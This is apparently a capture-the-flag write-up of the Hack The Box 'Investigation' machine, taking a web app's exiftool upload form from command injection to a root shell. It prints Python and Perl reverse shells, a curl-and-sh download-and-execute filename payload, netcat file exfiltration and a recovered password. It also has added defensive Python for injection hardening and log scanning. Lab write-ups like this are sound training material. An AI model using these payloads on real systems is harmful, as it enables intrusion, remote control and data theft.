Investigation
Nmap tells us that there are two ports open:
nmap -sC -sV -oA nmap/ -T4 10.129.138.100
# Nmap 7.93 scan initiated Sun Jan 22 11:12:19 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.53.197
Nmap scan report for 10.129.53.197
Host is up (0.076s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
| 256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_ 256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 22 11:12:29 2023 -- 1 IP address (1 host up) scanned in 9.63 seconds
There seems to be a domain attached to the IP, so let's add it to our /etc/hosts:
The website seems to be built on PHP. There's a file upload form at /upload.php.
After the upload the page gives us a link to the forensics result:
The "forensics" seems to be just exiftool output. Exiftool is a command-line program, so chances are the app also runs Linux commands directly to generate the result. Let's play with the file upload a bit: upload some JPEG image on the form again, but this time intercept the request with Burp Suite.
Here we simply edited the filename of the image to include sleep, and the request actually takes 5 seconds to execute! Next, let's get a reverse shell. Note: some characters seem to be filtered (at least |), so the next command may look a bit unusual.
First, let's create a folder www and host a file index.html there. The contents of index.html are:
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Next, navigate to the www folder and start a Python web server:
python3 -m http.server
Before executing our script via the file upload, start a netcat listener on port 9001:
nc -lnvp 9001
Next, upload another file and intercept it with Burp; before sending it, change the filename to the following:
curl 10.10.14.40:8000 --output test && sh test && sleep 10 |
Basically, it downloads the contents of our index.html file and executes it with sh. After sending the request we get a shell as www-data!
On the server there seems to be another user called smorton. We have no access to his home directory. After enumerating a bit we can see that there's a file belonging to the smorton group that we can access:
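The injection above works because the upload handler pastes the client-supplied filename into a shell command that runs exiftool. The following is an added example, not the eforenzics.htb application's code (which is PHP): it shows the same bug pattern in Python next to the fix a defender would apply (random on-disk names with an allow-listed extension, and an argv list instead of a shell string), plus a small detection hook for logging filenames that carry shell metacharacters. The function names and the "photo.jpg; sleep 5" payload are constructed for the example.

```python
import os
import re
import secrets
import shlex
import subprocess

# Constructed example, not the eforenzics.htb upload handler: the real app is
# PHP, this reproduces the same flaw and its fix in Python.

ALLOWED_EXT = {".jpg", ".jpeg", ".png"}
SHELL_META = re.compile(r"[;&|`$<>\\\n'\"()]")


def vulnerable_command(client_filename: str) -> str:
    """The bug pattern the writeup abuses: the client filename is pasted into a
    shell command string, so /bin/sh interprets any metacharacters in it.
    Returned as a string and never executed here."""
    return "exiftool " + client_filename


def shell_words(command: str) -> list:
    """Tokenise a command line the way a POSIX shell would, so the ';' in an
    injected filename visibly becomes a command separator."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def is_suspicious(client_filename: str) -> bool:
    """Detection hook: alert when an upload name carries shell metacharacters."""
    return SHELL_META.search(client_filename) is not None


def stored_name(client_filename: str) -> str:
    """Hardening step 1: never reuse the client's name on disk. Keep only an
    allow-listed extension and generate a random basename."""
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    return secrets.token_hex(16) + ext


def exiftool_argv(path: str) -> list:
    """Hardening step 2: build an argv list (no shell). '--' stops a name that
    starts with '-' from being parsed as an exiftool option."""
    return ["exiftool", "--", path]


def run_exiftool(path: str, timeout: int = 10) -> str:
    """Run exiftool without a shell; metacharacters in path stay literal."""
    result = subprocess.run(exiftool_argv(path), capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    evil = "photo.jpg; sleep 5"   # constructed payload shaped like the writeup's
    print(shell_words(vulnerable_command(evil)))      # ';' splits off a second command
    print(is_suspicious(evil), is_suspicious("holiday.jpg"))
    print(exiftool_argv("/var/www/uploads/" + stored_name("holiday.JPG")))
```

Note that stored_name() rejects the injected name outright, because os.path.splitext() treats everything after the last dot as the extension and "jpg; sleep 5" is not on the allow list; even if it were accepted, exiftool_argv() would pass the path as a single argument.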
find / -group smorton 2>/dev/null
/home/smorton
/usr/local/investigation/Windows Event Logs for Analysis.msg
Let's send the file to our local machine using netcat. On the local machine run:
nc -l -p 1234 -q 1 > message.msg < /dev/null
And on the server run:
cat '/usr/local/investigation/Windows Event Logs for Analysis.msg' | nc 10.10.14.40 1234
After downloading the file let's analyze it. The file command tells us that it's a Microsoft Outlook message file:
joonas@joonas-VirtualBox:~/Documents/htb/investigation$ file message.msg
message.msg: CDFV2 Microsoft Outlook Message
We can convert the file into a readable format by running msgconvert:
msgconvert message.msg
This generates a message.eml file, which contains the email in text format:
Interesting: there is some talk about logs, and the rest of the text is base64-encoded. After decoding it (CyberChef or the base64 command-line utility works; the file is long so I won't show it here) we get a zip file, and unzipping that gives us a file called security.evtx. Running file on it confirms that it's a Windows event log (no surprises here):
file security.evtx
security.evtx: MS Windows Vista Event Log, 238 chunks (no. 237 in use), next record no. 20013
We can use evtx_dump.py to convert the file into XML (you can also send it to a Windows VM and analyze it there):
evtx_dump.py security.evtx > security.xml
Now we have access to the log file!
The next step can be a bit tedious. My reasoning here was that maybe someone accidentally typed a password into the username field and the Windows event log saved the password? Far-fetched? Maybe, but it worked! Running
cat security.xml |grep TargetUserName |grep -v "Jenkins\|EFORENZICS\|SYSTEM\|ljenkins\|Administrators\|SMorton\|AAnderson"
on the log file shows us that there is some kind of password!
.....
<Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data>
.....
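The grep -v above is a manual version of a check a defender can run routinely over Security logs: list logon events whose TargetUserName is not a known account, and flag values that look like a password typed into the wrong field. The following is an added example, not from the writeup or from python-evtx: it parses XML in the shape evtx_dump.py produces (the embedded records, record IDs and the "S3cr3t-P@ssw0rd!" value are constructed for the example and are not taken from the machine's security.evtx), keeps only 4624/4625 logon events, and scores each unknown name with a simple character-class heuristic.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape evtx_dump.py emits (one <Event> per record,
# each carrying the Windows event namespace). Values are made up for this
# example and are not from the machine's security.evtx.
SAMPLE_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4624</EventID><EventRecordID>1001</EventRecordID></System><EventData><Data Name="TargetUserName">SMorton</Data><Data Name="LogonType">2</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4625</EventID><EventRecordID>1002</EventRecordID></System><EventData><Data Name="TargetUserName">S3cr3t-P@ssw0rd!</Data><Data Name="LogonType">2</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4625</EventID><EventRecordID>1003</EventRecordID></System><EventData><Data Name="TargetUserName">ljenkins</Data><Data Name="LogonType">3</Data></EventData></Event>
</Events>
"""

# Accounts the writeup filtered out with grep -v, lower-cased for comparison.
KNOWN_ACCOUNTS = {"smorton", "ljenkins", "aanderson", "administrators",
                  "system", "jenkins", "eforenzics"}
LOGON_EVENTS = {"4624", "4625"}   # successful / failed logon


def iter_logon_events(xml_text):
    """Yield (record_id, event_id, target_user_name) for logon events.
    '{*}' in the paths matches any namespace, so the Windows event
    namespace does not have to be spelled out."""
    root = ET.fromstring(xml_text)
    for ev in root.iterfind("{*}Event"):
        event_id = ev.findtext("{*}System/{*}EventID")
        if event_id not in LOGON_EVENTS:
            continue
        record_id = int(ev.findtext("{*}System/{*}EventRecordID"))
        name = None
        for data in ev.iterfind("{*}EventData/{*}Data"):
            if data.get("Name") == "TargetUserName":
                name = data.text or ""
        if name is not None:
            yield record_id, event_id, name


def password_like(value):
    """Heuristic: account names rarely mix three or more character classes.
    Length >= 8 and at least three of lower/upper/digit/other counts as a hit."""
    classes = [re.search(r"[a-z]", value), re.search(r"[A-Z]", value),
               re.search(r"\d", value), re.search(r"[^A-Za-z0-9]", value)]
    return len(value) >= 8 and sum(1 for c in classes if c) >= 3


def unknown_logon_names(xml_text, known=KNOWN_ACCOUNTS):
    """The writeup's grep -v idea as code: return logon events whose
    TargetUserName is not a known account, tagged with the password heuristic."""
    hits = []
    for record_id, event_id, name in iter_logon_events(xml_text):
        if name.lower() not in known:
            hits.append((record_id, event_id, name, password_like(name)))
    return hits


if __name__ == "__main__":
    for record_id, event_id, name, suspicious in unknown_logon_names(SAMPLE_XML):
        print(record_id, event_id, repr(name), "password-like" if suspicious else "")
```

To run it over the real dump, replace SAMPLE_XML with open("security.xml").read(); a hit that is both unknown and password-like is the one worth rotating immediately, which is exactly what the grep found on this box.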
Luckily, this password is also valid for user smorton on ssh!
Running sudo -l as smorton reveals that we can run a binary as root:
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
smorton@investigation:~$
Let's download the binary to our local machine and analyze it in Ghidra.
Ghidra does a pretty good job of displaying the decompiled C code. The program requires 3 arguments (binary name included) and the last one must be 'lDnxUysaQn'. It then takes the second argument, uses it as the URL for a curl command, runs the downloaded output with perl and cleans up afterwards. In other words, it downloads and executes a Perl script. Let's set up a Perl reverse shell on our local machine:
use Socket;$i="10.10.14.40";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
And once again, set up a netcat listener:
nc -lnvp 9001
And finally, run the binary:
sudo /usr/bin/binary http://10.10.14.40:8000/shell.pl lDnxUysaQn
Running...
And our netcat listener should have a root shell:
joonas@joonas-VirtualBox:~/Documents/htb/investigation$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.138.100 35924
# whoami
root
#
GG